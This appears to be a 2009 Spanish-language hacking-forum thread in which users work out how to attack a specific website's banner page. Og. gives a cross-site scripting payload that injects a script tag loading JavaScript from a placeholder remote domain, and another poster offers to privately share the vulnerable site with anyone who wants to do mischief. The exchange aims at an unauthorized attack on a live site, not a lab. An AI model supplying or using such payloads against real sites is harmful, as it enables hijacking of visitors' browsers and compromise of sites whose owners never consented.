Necesito ayuda con inyeccion por PHP

Jubjub · 25 Agosto 2009, 20:23 PM

No se puede inyectar php mas que en funciones eval ()

Skeletron · 25 Agosto 2009, 20:51 PM

Buen punto... Muchas gracias..

Creo que sin poder ingresar el ' y " voy a ahcer poca cosa solo...
Mejor dejo todo tranquilo.. sin maldades..

Por las dudas, si alguien quiere hacer maldades.. que me diga por MP y le paso la web con la vulnerabilidad...

Og. · 26 Agosto 2009, 03:04 AM

Cita de: Skeletron en 25 Agosto 2009, 20:51 PM
Buen punto... Muchas gracias..

Creo que sin poder ingresar el ' y " voy a ahcer poca cosa solo...
Mejor dejo todo tranquilo.. sin maldades..

Por las dudas, si alguien quiere hacer maldades.. que me diga por MP y le paso la web con la vulnerabilidad...

nop xD

Código [Seleccionar]

<script src=http://tudominio/tuscript.js ></script>

Saludos!

Skeletron · 26 Agosto 2009, 03:09 AM

Y eso amigo??? donde lo queres meter?
Acordate que todo ésto está dentro de un campo IMG

Og. · 26 Agosto 2009, 03:24 AM

Cita de: fede_cp en 22 Agosto 2009, 19:19 PM
hola, mira es algo asi como un html inyection o Xss, proba con [url="http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/"]http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/[/url]><script>alert(05)</script>

si da una alerta con el num 5 es vulnerable a cross scripting, html inyection o como le quieras decir

saludps

Cita de: Skeletron en 22 Agosto 2009, 22:22 PM
Si, el 1º dió el aviso de "5" en una alerta...

Buscaré algo de crosscripting..

entonces:

Código [Seleccionar]

http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/><script src=http://tudominio/tuscript.js ></script>

saludos!

Test Foro de elhacker.net SMF 2.1

Necesito ayuda con inyeccion por PHP

Jubjub

Skeletron

Og.

Skeletron

Og.